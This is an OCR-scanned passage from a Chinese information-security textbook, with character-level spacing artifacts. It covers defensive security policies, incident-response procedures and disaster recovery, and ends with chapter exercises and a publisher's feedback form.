对 依据 口令 进行 认证 的 网 络 应 采取 以 下 策略 : 

(1) 用 户 必 须 设 定 口令 ,并 努力 做 到 保密 ; 

(2) 若 用 户 设 定 口 令 时 ,应 指导 他 们 尽量 避免 设 定 易于 猜测 的 词语 ,并 在 系统 上 设置 拒 
绝 这 种 口令 的 机 制 ; 

(3) 指导 用 户 每 隔 适当 时 间 就 更 改口 令 ,并 在 系统 中 设置 促使 更 改 的 功能 ， 

(4) 限制 口令 的 输入 次 数 ,采取 措施 使 他 人 难以 推测 口令 ; 

(5) 用 户 一 旦 忘记 口令 ,就 提供 口令 指示 ,确认 后 口令 恢复 ; 

(6) 对 口令 文本 采取 加 密 方法 ,努力 做 到 保密 ; 

(7) 在 网 络 访问 登录 时 ,进行 身份 识别 和 认证 ; 

(8) 对 于 认证 方法 ,应 按照 信息 系统 的 安全 需求 进行 选择 ; 

(9) 设 定 可 以 确认 前 次 登录 日 期 与 时 间 的 功能 。 


4. 用 户 身 份 识 别 ( 用 户 ID) 管 理 


(1) 对 于 因 退 职 、 调 动 .长 期 出 差 或 留学 而 不 再 需要 或 长 期 不 使 用 的 用 户 ID 予 以 注销 ; 
(2) 对 长 期 未 进行 登记 的 用 户 以 书面 形式 予以 通知 。 


5. 加 密 

(1) 进行 通信 时 根据 需要 对 数据 实行 加 密 ; 

(2) 要 切实 做 好 密 钥 的 保管 工作 ,特别 是 对 用 户 密 钥 进行 集中 保管 时 要 采取 妥善 的 保 
管 措 施 。 

6. 数据 交换 


(1) 在 进行 数据 交换 之 前 ,对 和 欲 进 行 通 信 的 对 象 进行 必要 的 认证 ; 

(2) 以 数字 签名 等 形式 确认 数据 的 完整 性 ; 

(3) 设 定 能 够 证 明 数 据 发 出 和 接收 以 及 可 以 防止 欺骗 的 功能 ; 

(4) 在 前 3 步 利 用 加 密 操 作 的 情况 下 ,对 用 户 的 密 钥 进行 集中 管理 时 ,要 寻求 妥善 的 管 
理 方法 。 


7. 灾害 策略 
为 防止 因 灾害 .事故 造成 线路 中 断 , 有 必要 做 成 热 备 份 线路 。 
6.3.2 基于 主机 的 安全 策略 


管理 者 为 防止 发 生 对 主机 非法 访问 或 未 授权 用 户 使 用 等 情况 ,应 采取 以 下 策略 。 
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1. 监视 日 志 


(1) 读 取 日 志 , 根 据 日 志 的 内 容 至 少 可 确定 访问 者 的 情况 ; 

(2) 确保 日 志 本 身 的 安全 ; 

(3) 对 日 志 进 行 定期 检查 ; 

(4) 应 将 日 志保 存 到 下 次 检查 时 ; 

(5) 具备 检测 不 正当 访问 的 功能 ; 

(6) 设置 出 现 不 正当 访问 时 ,能 够 将 其 查 出 并 通知 风险 管理 者 的 功能 。 


2. 口令 


对 依据 口令 进行 认证 的 主机 等 应 采取 以 下 策略 : 

(1) 用 户 必 须 设 定 口令 ,并 努力 做 到 保密 ; 

(2) 若 用户 设 定 口 令 时 ,应 指导 他 们 尽量 避免 设 定 易于 猜测 的 词语 ,并 在 系统 上 设置 拒 
绝 这 种 口令 的 机 制 ; 

(3) 指导 用 户 每 隔 适 当时 间 就 更 改口 令 , 并 在 系统 中 设置 促使 更 改 的 功能 ; 

(4) 限制 口令 的 输入 次 数 , 采 取 措 施 使 他 人 难以 推测 口令 ; 

(5) 用 户 一 旦 忘记 口令 ,就 提供 口令 指示 ,确认 后 口令 恢复 ; 

(6) 对 口令 文本 采取 加 密 方法 ,努力 做 到 保密 。 


3. 对 主机 的 访问 


(1) 在 记录 日 志 时 进行 识别 和 认证 ; 

(2) 对 于 认证 方法 ,按照 信息 系统 所 需 的 安全 要 求 进行 选择 ; 

(3) 设置 可 以 确认 前 次 日 志 记 录 日 期 的 功能 ; 

(4) 根据 安全 方针 ,除了 对 主机 的 访问 加 以 控制 外 ,对 数据 库 的 数据 、 移 动 存储 设备 也 
应 分 别 进行 控制 ; 

(5) 为 确保 访问 控制 等 功能 的 安全 ,有 必要 选择 具有 相应 功能 的 操作 系统 。 


4. 安全 漏洞 


(1) 采用 专用 软件 ,对 是 否 存在 安全 漏洞 进行 检测 ; 
(2) 发 现 安全 漏洞 时 ,要 采取 措施 将 其 清除 。 


5. 加 密 


(1) 在 保管 数据 时 ,要 根据 需要 对 数据 等 实行 加 密 ; 
(2) 要 切实 做 好 密 钥 的 保管 工作 ,特别 是 对 用 户 密 钥 进 行 集中 保管 时 要 采取 妥善 的 保 
管 措施 。 


6. 对 主机 的 管理 


(1) 应 采取 措施 使 各 装置 不 易 拆 印 、 安 装 或 搬运 ; 
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(2) 要 采取 措施 ,避免 显示 屏 上 的 信息 让 用 户 以 外 的 人 直接 得 到 或 易于 发 现 。 
7. 预防 灾害 策略 


(1) 根据 需要 将 装置 做 成 热 备份 的 ,要 设置 蔡 代 功能 ; 
(2) 设置 自动 恢复 功能 。 


6.3.3 基于 设施 的 安全 策略 


管理 者 为 了 防止 重要 的 计算 机 主机 系统 设施 不 受 外 部 人 员 的 侵入 或 遭受 灾害 ,应 采取 
以 下 办 法 。 


1. 授予 资格 


(1) 建立 进入 设施 的 资格 (以 下 称 资格 )， 

(2) 资格 授予 最 小 范围 的 必需 者 ,并 限定 资格 的 有 效 时 间 ; 

(3) 资格 仅 授予 个 人 ， 

(4) 授予 资格 时 ,要 注 明 可 能 进入 的 设施 范围 及 进入 设施 的 目的 。 


2. 建立 身份 标识 


(1) 对 拥有 资格 的 人 员 发 给 记 有 以 下 事项 的 身份 标识 和 IC 卡 等 (以 下 称 身 份 证 ) 。 

。 资格 的 有 效 期 ; 

。 可 进入 的 设施 范围 及 进入 的 目的 ; 

。 照片 等 个 人 识别 信息 。 

(2) 制作 标识 的 材料 应 采用 不 易 伪 造 的 材料 ,另外 要 严格 管理 标识 原件 ( 指 存档 的 ) ,不 
使 之 丢失 。 

(3) 有 资格 的 人 员 标 识 遗 失 或 损坏 时 ,应 立即 报告 安全 总 负责 人 。 

(4) 当 按照 (3) 项 报告 后 , 即 宣布 该 标识 无 效 。 


3. 设施 出 入 管理 


(1) 为 获准 进入 设施 ,要 提交 身份 标识 确认 资格 ; 

(2) 限定 允许 出 入 设施 的 期 限 ; 

(3) 将 允许 进入 人 员 的 姓名 ,准许 有 效 期 限 、 可 进入 的 设施 范围 .进入 目的 以 及 进入 设 
施 的 许可 (以 下 称许 可 ) 等 记录 下 来 并 妥善 保存 ; 

(4) 对 允许 进入 的 人 员 发 给 徽章 等 进入 设施 的 标志 ,并 将 该 标志 佩带 在 明显 的 位 置 ; 

(5) 进入 设施 的 标志 应 按照 身份 标识 中 的 (2) 一 (4) 项 要 求 执行 ; 

(6) 在 建筑 物 或 计算 机 房 的 出 入口 处 查验 是 否 具有 资格 和 许可 ; 

(7) 当 从 设施 中 搬出 或 搬入 物资 时 ,都 应 对 该 物资 和 搬运 工作 进行 查验 ; 

(8) 物资 搬运 出 入 时 ,应 记录 负责 人 的 姓名 ,物资 名 称 数量 、 搬 运 出 入 时 间 等 ,并 保存 。 

(9) 保安 人 员 负 责 出 入 管理 。 


4. 防范 措施 


(1) 限定 设施 出 入 口 的 数量 ,设置 进行 身份 确认 的 措施 ; 
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(2) 在 设施 内 装 设 报 警 和 防范 摄像 装置 ,以 便 在 发 现 侵 入 时 采取 必要 的 防范 措施 ; 

(3) 在 建筑 物 、 机 房 及 外 设 间 、 配 电 室 、 空 调 室 、 主 配 电 室 (MDF) 中间 配 电 室 (IDF) 、 数 
据 保 存 室 等 的 入 口 处 设置 报警 装置 ,以便 在 发 现 侵入 时 采取 必要 的 防范 措施 ; 

(4) 让 保安 人 员 在 设施 内 外 进行 巡视 。 


5. 灭 害 策略 


(1) 设施 的 地 点 应 尽 可 能 选 在 自然 灾害 较 少 的 地 方 ; 

(2) 建筑 物 应 选择 抗震 、 防 火 结 构 ; 

(3) 各 种 设备 都 应 采取 措施 ,防止 因 地 震 所 导致 的 移动 . 翻 倒 或 振动 ; 

(4) 内 装修 应 使 用 耐 燃 材料 ,采取 防火 措施 ; 

(5) 对 电源 设备 要 采取 防止 停电 措施 ; 

(6) 对 空气 调节 装置 要 采取 防火 和 防水 措施 ,使 用 水 冷 或 热 式 空调 设备 时 要 采取 防水 
的 措施 。 


6.3.4 基于 数据 管理 的 安全 策略 


1. 数据 管理 


(1) 当 重 要 数据 的 日 志 不 再 使 用 时 ,应 先 将 数据 清除 ,再 将 存储 介质 破坏 ,随后 立即 将 
该 记录 文件 销毁 ; 

(2) 对 记录 有 重要 数据 的 记录 文件 应 采取 措施 ,做 好 保管 场所 携带 出 入 的 管理 ,将 数据 
用 密码 保护 ; 

(3) 对 移动 存储 介质 ,根据 需要 应 采取 数据 加 密 或 物理 方法 禁止 写 人 等 措施 。 

2. 数据 备份 


应 定期 或 尽 可 能 频繁 地 进行 备份 。 备 份 介质 应 制定 妥善 的 保存 办 法 、 保 存 期 限 ,与 原 介 
质 在 不 同 地 方 保管 。 

3. 审计 

(1) 应 从 信息 系统 的 安全 性 .可 信 度 、 保 全 性 和 预防 犯罪 的 角度 进行 审计 ， 

(2) 制定 审计 的 方法 并 制 成 手册 ; 

(3) 有 计划 、 定 期 地 进行 审计 ,车 有 重大 事故 发 生 或 认为 有 危险 发 生 时 ,应 随时 进行 
审计 ; 

(4) 提交 审计 报告 ; 

(5) 安全 总 负责 人 应 根据 审计 结果 迅速 采取 必要 的 措施 。 


6.3.5 信息 系统 开发 .运行 和 维护 中 的 安全 策略 


1. 开发 中 的 安全 策略 


(1) 采取 措施 防止 将 基础 数据 泄露 给 从 事 开 发 以 外 的 其 他 人 员 ; 
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(2) 制定 专门 的 系统 设计 文档 
(3) 制定 专门 的 运行 和 维护 手册 ; 
(4) 运行 手册 中 应 制定 出 危机 范围 和 风险 策略 。 


2. 运行 中 的 安全 策略 


(1) 根据 手册 操作 ; 
(2) 记录 运行 情况 日 志 。 


3. 维护 中 的 安全 策略 


(1) 根据 手册 操作 ， 
(2) 记录 维护 情况 。 


6.3.6 基于 安全 事件 的 安全 策略 


管理 者 在 发 生 犯 罪 事件 时 能 确保 与 有 关 部 门 取得 联系 ,与 危机 进行 切实 应 对 ,从 而 确保 
安全 ,应 采取 以 下 策略 。 


1. 发 现 攻击 时 应 采取 的 管理 措施 


(1) 当 发 现 对 用 户 等 进行 攻击 .事故 或 侵害 等 其 他 信息 系统 安全 的 行为 或 事件 (以 下 简 
称 攻 击 ) 时 ,有 义务 立即 向 危机 管理 负责 人 报告 ; 

(2) 应 将 受到 攻击 的 对 象 .非法 访问 的 结果 、` 出 入 时 的 日 志 以 及 其 后 审计 或 调查 所 需 的 
信息 等 ,作为 发 现 攻击 行为 的 状态 保存 下 来 ; 

(3) 及 时 向 相关 部 门 通报 ; 

(4) 发 现 非法 访问 行为 且 需 要 得 到 相关 部 门 援助 时 ,提出 申请 ; 

(5) 调查 结束 ,在 进行 系统 恢复 时 ,应 将 操作 过 程 记录 下 来 。 


2. 组 织 体制 


为 明确 责任 和 权限 应 建立 以 下 体制 ; 
(1) 日 常事 务 体制 : 设立 专职 的 安全 总 负责 人 和 审计 负责 人 ; 
(2) 风险 管理 体制 : 设 专职 的 风险 管理 责任 人 .风险 管理 设备 执行 人 和 其 他 责任 人 。 


3. 教育 及 培训 


(1) 将 风险 发 生 时 的 防范 措施 制 成 手册 ,发 给 用 户 并 进行 定期 训练 ; 
(2) 让 用 户 了 解 风险 对 社会 带 来 较 大 的 危害 ,从 而 提高 安全 意识 ; 
(3) 对 用 户 策略 实施 情况 进行 审计 ,对 措施 不 完备 的 地 方 加 以 改进 。 


6.3.7 与 开放 性 网 络 连 接 的 信息 系统 应 追加 的 安全 措施 


对 于 信息 系统 来 说 ,除了 前 面 所 述 安全 策略 之 外 ,从 预防 非法 访问 .计算 机 病毒 侵入 的 
角度 来 看 ,与 Internet 等 开放 性 网 络 连接 ,还 应 追加 下 列 安全 措施 。 


1. 一 般 措施 


网 络 系统 考虑 通过 开放 性 网 络 引 入 的 不 正当 访问 和 恶意 程序 侵入 ,应 当 追 加 如 下 措施 。 
(1) 与 开放 性 网 络 的 连接 应 限定 在 最 小 范围 的 功能 、 线 路 和 主机 ; 

(2) 与 开放 性 网 络 连接 时 ,应 采取 措施 预防 对 信息 系统 进行 不 正当 的 访问 ; 

(3) 利用 防火 墙 时 ,应 设 定 适当 的 条 件 ; 

(4) 使 用 计算 机 系统 时 ,应 采取 一 定 的 安全 措施 ,确保 该 信息 系统 的 安全 ; 

(5) 关于 网 络 结构 等 重要 信息 除非 必要 时 ,不 得 公开 。 


2. 监视 措施 


应 当 设置 对 线路 负荷 状况 的 监视 功能 。 发 现 异 常情 况 时 ,应 根据 需要 使 之 与 相连 接 的 
开放 性 网 络 断 开 。 


3. 安全 事件 应 对 措施 


在 确保 攻击 发 生 时 能 与 相关 部 门 取得 联系 。 对 危机 进行 准确 应 对 的 同时 ,还 应 采取 如 
下 措施 。 
(1) 与 相关 机 构 合作 ,把 握 受 侵害 的 情况 ,采取 措施 ,防止 侵害 的 扩大 ; 
(2) 对 攻击 进行 分 析 , 查 明 原 因 , 与 相关 机 构 合作 采取 措施 ,防止 攻击 再 次 发 生 ; 
(3) 限定 用 户 , 即 尽 可 能 将 可 通过 开放 性 网 络 进行 访问 的 用 户 ( 数 ) 加 以 限制 ; 
(4) 信息 收集 , 即 平时 要 注意 收集 通过 开放 性 网 络 进行 非法 访问 的 信息 。 


6.4 应 急 啊 应 与 灾难 恢复 


1988 年 , 莫 里 斯 蠕虫 以 迅雷 不 及 掩 耳 之 势 肆 虐 互 联网 ,招致 上 千 台 计算 机 系统 的 崩溃 ， 
造成 了 以 千 万 美元 计 的 损失 。 这 突如其来 的 灾难 给 人 们 项 响 了 警钟 : 面 对 人 类 对 信息 系统 
依赖 程度 不 断 增强 ,对 付 入 侵 不 仅 需要 防御 ,还 要 能 够 在 事件 发 生 后 进行 紧急 处 理 和 援助 。 
1989 年 ,在 美国 国防 部 的 资助 下 , CERT(computer emergency response team, 计 算 机 紧急 
响应 组 )/CC(Call Center) 成 立 。 从 此 紧急 响应 被 摆 到 了 人 们 的 议事 桌 上 。CERT 成 立 以 
后 ,做 了 大 量 工作 ,但 最 大 的 成 就 是 使 紧急 响应 为 人 们 普遍 接受 。 

一 般 来 说 ,每 个 使 用 信息 系统 的 组 织 都 应 当 有 一 套 紧 急 响 应 的 机 制 。 这 个 机 制 包括 3 
个 环节 : 

。 应 急 响应 组 织 ; 

。 紧急 预案 ; 

。 灾难 恢复 。 


6.4.1 应 急 响 应 组 织 


应 急 响应 组 织 的 主要 工作 有 : 
。 安全 事件 与 软件 安全 缺陷 分 析 研 究 ; 
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。 安 全 知识 库 ( 包 括 漏洞 知识 、 入 侵 检测 等 ) 的 开发 与 管理 ; 
。 安 全 管理 和 应 急 知识 的 教育 与 培训 ; 
。 发 布 安全 信息 (如 系统 漏洞 与 补丁 、 病 毒 警 告 等 ) ; 
。 安全 事件 紧急 处 理 。 
应 急 响 应 组 织 包括 应 急 保 障 领 导 小 组 和 应 急 技术 保障 小 组 。 应 急 保障 领导 小 组 的 主要 
职责 是 领导 与 协调 突 发 事件 及 自然 灾害 的 应 急 处 理 。 应 急 技术 保障 小 组 主要 解决 安全 事件 
的 技术 问题 ,如 物理 实体 和 环境 安全 技术 、 网 络 通信 技术 、 系 统 平台 技术 、 应 用 系统 技术 等 。 


6.4.2 紧急 预案 


1. 紧急 预案 及 基本 内 容 


应 急 预 案 是 指 根据 不 同 的 突 发 紧急 事件 类 型 和 以 外 情形 预先 制定 的 处 理 方案 。 应 急 预 
案 一 般 包括 如 下 内 容 : 

。 执行 紧急 预案 的 人 员 ( 姓 名 ,住址 ,电话 号 码 以 及 有 关 职 能 部 门 的 联系 方法 ); 

。 系统 紧急 事件 类 型 及 处 理 措施 的 详细 说 明 ， 

。 应 急 处 理 的 具体 步骤 和 操作 顺序 。 


2. 常见 安全 事件 


紧急 预案 要 根据 安全 事件 的 类 型 进行 对 应 的 处 理 。 下 面 提供 一 些 常见 的 安全 事件 类 型 
供 参考 ， 

。 物理 实体 及 环境 类 安全 事件 ,如 意外 停电 ,物理 设备 丢失 .火灾 和 水 灾 等 ; 

。 网 络 通信 类 安全 事件 , 如 网 络 蠕虫 侵害 等 ; 

。 主机 系统 类 安全 事件 ,如 计算 机 病毒 .口令 丢失 等 ; 

。 应 用 系统 类 安全 事件 ,如 客户 信息 丢失 等 。 


3. 应 急事 件 处 理 的 基本 流程 


(1) 安全 事件 报警 

值班 人 员 发 现 紧 急 情况 ,要 及 时 报告 。 报 告 要 对 安全 事件 进行 准确 描述 并 作 书 面 记 录 。 
按照 安全 事件 的 类 型 ,安全 事件 呈报 条 例 应 依次 报告 : 值班 人 员 ,应 急 工作 组 长 ,应 急 领 导 
小 组 。 如 果 想 进行 任何 类 型 的 跟踪 调查 或 者 起 诉 入 侵 者 ,应 先 跟 管理 人 员 和 法 律 顾问 商量 ， 
然后 通知 有 关 执 法 机 构 。 一 定 要 记 住 ,除非 执法 部 门 的 参与 ,否则 对 入 侵 者 进行 的 一 切 跟 踪 
都 可 能 是 非法 的 。 

同时 ,还 应 通知 有 关 人 员 ,交换 相关 信息 ,必要 时 可 以 获得 援助 。 

(2) 安全 事件 确认 

确定 安全 事件 的 类 型 ,以 便 启动 相应 的 预案 。 

(3) 启动 紧急 预案 

@ 首先 要 能 够 找到 紧急 预案 。 

@ 保护 现场 证 据 ( 如 系统 事件 .处 理 者 采取 的 行动 .与 外 界 的 沟通 等 ) ,避免 灾害 扩大 。 
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(4) 恢复 系统 

@ 安装 干净 的 操作 系统 版 本 。 如 果 主 机 被 侵入 ,就 应 当 考 虑 系统 中 的 任何 东西 都 可 能 
被 攻击 者 修改 过 了 ,包括 内 核 . 二进制 可 执行 文件 .数据 文件 .正在 运行 的 进程 以 及 内 存 。 通 
常 ,需要 从 发 布 介质 上 重 装 操作 系统 ,然后 再 重新 连接 到 网 络 上 之 前 安装 所 有 的 安全 补丁 ， 
只 有 这 样 才 会 使 系统 不 受 后 门 和 攻击 者 的 影响 。 只 是 找 出 并 修补 被 攻击 者 利用 的 安全 缺陷 
是 不 够 的 。 

建议 使 用 干净 的 备份 程序 备份 整个 系统 ,然后 重 装 系统 。 

@ 取消 不 必要 的 服务 。 只 配置 系统 要 提供 的 服务 ,取消 那些 没有 必要 的 服务 。 检 查 并 
确信 其 配置 文件 没有 脆弱 性 以 及 该 服务 是 否 可 靠 。 通 常 , 最 保守 的 策略 是 取消 所 有 的 服务 ， 
只 启动 自己 需要 的 服务 。 

@ 安装 供应 商 提供 的 所 有 补丁 。 建 议 安装 所 有 的 安全 补丁 ,使 系统 能 够 抵御 外 来 攻 
击 ,不 被 再 次 侵入 ,这 是 最 重要 的 一 步 。 

@ 查阅 CERT 的 安全 建议 .安全 总 结 和 供应 商 的 安全 提示 。 

查阅 CERT 以 前 的 安全 建议 和 总 结 , 以 及 供应 商 的 安全 提示 ,一 定 要 安装 所 有 的 安全 
补丁 。 

。 CERT 安全 建议 : http: //www. cert. org/advisories/ 

。 CERT 安全 总 结 : http: //www. cert. org/advisories/ 

。 供应 商 安全 提示 : ftp: //ftp. cert. org/pub/cert_bulletins/ 

@ 谨慎 使 用 备份 数据 。 在 从 备份 中 恢复 数据 时 ,要 确信 备份 主机 没有 被 侵 人 。 一 定 要 
记 住 ,恢复 过 程 可 能 会 重新 带 来 安全 缺陷 ,被 入 侵 者 利用 。 例 如 ,恢复 用 户 的 home 目录 和 
数据 文件 中 ,以 及 用 户 起 始 目录 下 的 . rhost 文件 中 也 许 藏 有 特洛伊 木马 程序 。 

@ 改变 密码 

在 弥补 了 安全 漏洞 或 者 解决 了 配置 问题 以 后 ,建议 改变 系统 中 所 有 账户 的 密码 。 

(5) 加 强 系统 和 网 络 的 安全 

@ 根据 CERT 的 UNIX/NT 配置 指南 ,检查 系统 的 安全 性 。 

CERT 的 UNIX/NT 配置 指南 可 以 帮助 检查 系统 中 容易 被 人 侵 者 利用 的 配置 问题 : 


http: //www. cert. org/tech_tips/unix_configuration_guidelines. html 


http: //www. cert. org/tech_tips/win_configuration_guidelines. html 


查阅 安全 工具 文档 可 以 参考 : http: //www. cert. org/tech_tips/security_tools. html。 

@ 安装 安全 工具 。 在 将 系统 连接 到 网 络 上 之 前 ,一 定 要 安装 所 有 选择 的 安全 工具 。 同 
时 ,最 好 使 用 Tripwire aide 等 工具 对 系统 文件 进行 MD5 校 验 ,把 校 验 码 放 到 安全 的 地 方 ， 
以 便 以 后 对 系统 进行 检查 。 

@ 打开 日 志 。 启 动 日 志 (logging) | 检查 (auditing) | 记 账 (accounting) 程 序 , 将 它们 设置 
到 准确 的 级 别 , 例 如 sendmail 日 志 应 该 是 9 级 或 者 更 高 。 

要 经 常备 份 日 志文 件 ,或 者 将 日 志 写 到 另外 的 机 器 一 个 只 能 增加 的 文件 系统 或 者 一 个 
安全 的 日 志 主 机 。 

@ 配置 防火 墙 对 网 络 进 行 防 御 。 可 以 参考 . http: //www. cert. org/tech_tips/packet 
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_filtering. html。 
@ 重新 连接 到 Internet。 完 成 以 上 步骤 以 后 ,就 可 以 把 系统 连接 回 Internet 了 。 应 当 
注意 ,安全 事件 处 理工 作 复杂 ,责任 重大 ,至 少 应 有 两 人 参加 。 
(6) 应 急 工作 总 结 
召开 会 议 , 分 析 问 题 和 解决 方法 ,参考 : ftp://ftp.isi. edu/in-notes/rfc2196. txt。 
@ 总 结 教 训 。 从 记录 中 总 结 出 对 于 这 起 事故 的 教训 ,这 有 助 于 检讨 自己 的 安全 策略 。 
@ 计算 事件 的 代价 。 计 算 事件 代价 有 助 于 让 组 织 认 识 到 安全 的 重要 性 。 
@ 改进 安全 策略 。 
(7) 撰写 安全 事件 报告 
安全 事件 报告 的 内 容 包 括 : 
。 安全 事件 发 生 的 日 期 .时 间 ， 
。 安全 事件 处 理 参 加 的 人 员 ; 
。 事件 发 现 的 途径 ， 
。 事件 类 型 ; 
。 事件 涉及 范围 ; 
现场 记录 ; 
事件 导致 的 损失 和 影响 ; 
。 事件 处 理 过 程 ; 
。 使 用 的 技术 和 工具 ; 
。 经 验 和 教训 。 


6.4.3 灾难 恢复 


灾难 恢复 是 安全 事件 应 急 预 案 中 特别 重要 的 部 分 。 从 发 现 人 侵 的 那 刻 起 就 围绕 它 进 
行 ,并 且 应 当 包括 如 下 几 项 内 容 : 

。 与 高 层 管理 人 员 协 商 ; 

。 夺回 系统 控制 权 ; 

。 复 制 被 侵 系 统 ; 

。 入侵 评估 : 分 析 入 侵 途 径 , 检 查 入 侵 对 系统 的 损害 ; 

。 清除 入 侵 者 留 下 的 后 门 ; 

。 记 录 恢 复 过 程 ; 


1. 与 高 层 管理 人 员 协 商 


恢复 的 步骤 应 当 符 合 组 织 的 安全 预案 。 如 果 安 全 预案 中 没有 描述 ,应 当 与 管理 人 员 协 
商 , 以 便 能 从 更 高 角度 进行 判断 ,并 得 到 更 多 部 门 的 支持 和 配合 。 


2. 夺回 系统 控制 权 


为 了 夺回 对 被 入 侵 系 统 的 控制 权 , 先 要 将 入 侵 从 网 络 上 断 开 ,包括 拨号 连接 。 如 果 在 恢 
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复 过 程 中 ,没有 断 开 被 侵入 系统 和 网 络 的 连接 ,入 侵 者 就 可 能 破坏 所 进行 的 恢复 工作 。 

进行 系统 恢复 也 会 丢失 一 些 有 用 信息 ,如 入 侵 者 正在 使 用 的 扫描 程序 或 监听 进程 。 因 
此 想 要 继续 追踪 入 侵 者 时 ,可 以 不 采取 这 样 的 措施 ,以 免 被 入 侵 者 发 现 。 但 是 ,也 要 采取 其 
他 一 些 措施 ,避免 人 侵 草 延 。 


3. 复制 一 份 被 侵入 系统 的 映像 


在 进行 人 侵 分 析 之 前 ,最 好 对 被 入侵 系统 进行 备份 (如 使 用 UNIX 命令 dd) 。 这 个 备份 
在 恢复 失败 时 非常 有 用 。 


4. 入 侵 评 估 
入 侵 评 估 包 括 入 侵 风 险 评 估 、 入 侵 路 径 分 析 、 入 侵 类 型 确定 和 入 侵 涉 及 范围 调查 。 下 面 
介绍 围绕 这 些 工作 进行 的 调查 工作 。 


(1) 详细 审查 系统 日 志文 件 和 显示 器 输出 ,检查 异常 现象 。 
(2) 入 侵 者 遗留 物 分 析 。 包 括 : 

。 检查 人 侵 者 对 系统 文件 和 配置 文件 的 修改 ; 

。 检查 被 修改 的 数据 ; 

。 检查 入 侵 者 留 下 的 工具 和 数据 ; 

。 检查 网 络 监听 工具 。 

(3) 其 他 ,如 网 络 的 周边 环境 和 涉及 的 远程 站 点 。 


5. 清除 后 门 


后 门 是 入 侵 者 为 下 次 攻击 打下 的 埋伏 ,包括 修改 了 的 配置 文件 .系统 木马 程序 、 修 改 了 
的 系统 内 核 等 。 


6. 记录 恢复 过 程 中 所 有 的 步骤 


毫 不 夸张 地 讲 , 记 录 恢 复 过 程 中 采取 的 每 一 步 措施 是 非常 重要 的 。 恢 复 一 个 被 侵入 的 
系统 是 一 件 很 麻烦 的 事 , 要 耗费 大 量 的 时 间 , 因 此 经 常会 使 人 作出 一 些 草率 的 决定 。 记 录 自 
己 所 做 的 每 一 步 可 以 帮助 避免 作出 草率 的 决定 ,还 可 以 留 作 以 后 的 参考 ,还 可 能 对 法 律 调查 
提供 帮助 。 


7. 系统 恢复 


各 种 安全 事件 预案 的 执行 都 是 为 了 使 系统 在 事故 后 得 以 迅速 恢复 。 对 于 服务 器 和 数据 
库 等 系统 特别 重要 的 设备 , 则 要 单独 订立 紧急 恢复 预案 。 

(1) 服务 器 的 恢复 

一 旦 服务 器 因 故 障 完全 停止 运行 ,常规 的 恢复 方法 是 在 一 个 新 的 硬件 平台 上 重建 。 步 
又 如 下 : 

Qa 安装 服务 器 操作 系统 ; 

@ 安装 所 有 需要 的 驱动 程序 ; 

@ 安装 所 有 需要 的 服务 软件 包 ; 
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@ 安装 所 有 需要 的 流行 修补 程序 和 安全 修补 程序 ; 

@ 安装 备份 软件 ; 

@ 安装 备份 软件 需要 的 修补 程序 ; 

@ 恢复 最 后 一 次 完全 备份 磁带 ; 

@ 恢复 所 有 增 量 备份 或 差异 备份 磁带 。 

显然 ,用 手工 进行 服务 器 的 恢复 是 非常 麻烦 的 。 如 果 能 设计 一 种 专门 的 软件 包 , 可 以 生 
成 存 有 服务 器 镜像 文件 的 启动 盘 , 用 来 恢复 服务 器 ,就 便利 多 了 。 

(2) 数据 库 系统 的 恢复 

数据 库 恢复 的 目的 是 在 足够 备份 的 基础 上 ,使 数据 库 尽快 恢复 到 正常 。 其 中 包括 : 

@ 数据 文件 恢复 : 把 备份 文件 恢复 到 原来 位 置 。 

@ 控制 文件 恢复 : 控制 文件 受 损 时 ,要 将 其 恢复 到 原 位 重新 启动 。 

@ 文件 系统 恢复 : 在 大 型 操作 系统 中 ,可 能 会 因 介质 受 损 ,导致 文件 系统 被 破坏 。 其 


T 


恢复 步骤 为 : 
”将 介质 重新 初始 化 ; 
。 重新 创建 文件 系统 ; 
。 利 用 备份 完整 地 恢复 数据 库 中 的 数据 ; 
。 启动 数据 库 系 统 。 
习 题 
1. 什么 是 可 信 计 算 基 ? 
2. 详细 说 明 安全 标记 保护 级 的 可 信 计 算 基 的 功能 。 
3， 结构 化 保护 级 的 主要 特征 有 哪些 ? 
4. 收集 国内 外 有 关 信 息 安全 标准 化 的 网 站 信息 ,简要 说 明 各 网 站 的 特点 。 


5. 收集 有 关 信 息 安全 的 定义 、 标 准 等 方面 的 最 新 概念 和 进展 。 可 以 从 下 面 的 网 站 


http: //www. radium. ncsc. mil/tpep/Pprocess/fag. html 
http: //www. itsec. gov. uk 
http: //www. cse-cst. gc. ca/pub/criteria/CTCPE 


6. 收集 资料 ,分 别 给 出 下 列 操作 系统 的 安全 等 级 ,并 说 明理 由 : 


(1) DOS 
(2) Windows 

(3) UNIX 

(4) Linux 

7. 比较 TCSEC、ITSEC、CC、GB17859 中 的 安全 级 别 。 
8. 风险 评估 对 于 信息 系统 安全 有 什么 意义 ? 

9. 为 一 个 组 织 的 信息 系统 进行 安全 风险 评估 。 


10. NAI 公 司 开发 了 一 个 用 于 安全 风险 评估 的 扫描 器 CyberCop Scanner, 试 安装 并 使 
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用 该 工具 。 

11. 为 学 籍 管理 系统 设计 一 个 安全 策略 。 这 个 系统 最 少 要 有 学 生 、 管 理 人 员 和 领导 进 
行 访 问 。 

12. 简 述 紧急 响应 的 意义 。 

13. 试 述 紧 急 响应 服务 在 实现 目的 方面 受 哪些 因素 制约 。 

14. 如 何 制定 紧急 响应 预案 ? 

15. 尽 可 能 多 地 举 一 些 安全 事件 。 

16. 简 述 应 急事 件 处 理 的 基本 流程 。 

17. 收集 国内 外 有 关 应 急 响 应 的 最 新 动态 。 
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电话 : 010-62770175-4608/4409 邮购 电话 : 010-62786544 
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个 人 资料 

姓名 : 年 龄 : 所 在 院 校 /专业 : 

文化 程度 : 通信 地 址 : 

联系 电话 : 电子 信箱 : 

您 使 用 本 书 是 作为 : 口 指定 教材 口 选 用 教材 口 辅导 教材 口 自学 教材 
您 对 本 书 封面 设计 的 满意 度 : 

口 很 满意 口 满 意 口 一 般 口 不 满意 ”改进 建议 

您 对 本 书 印刷 质量 的 满意 度 : 

口 很 满意 口 满 意 口 一 般 口 不 满意 ”改进 建议 

您 对 本 书 的 总 体 满意 度 : 


从 语言 质量 角度 看 口 很 满意 口 满意 口 一 般 口 不 满意 
从 科技 含量 角度 看 口 很 满意 口 满意 口 一 般 口 不 满意 
本 书 最 令 您 满意 的 是 : 
口 指导 明确 口内 容 充实 口 讲 解 详 尽 口 实例 丰富 
您 认为 本 书 在 哪些 地 方 应 进行 修改 ? (可 附 页 ) 


您 希望 本 书 在 哪些 方面 进行 改进 ? (可 附 页 ) 


电子 教案 支持 


敬爱 的 教师 : 

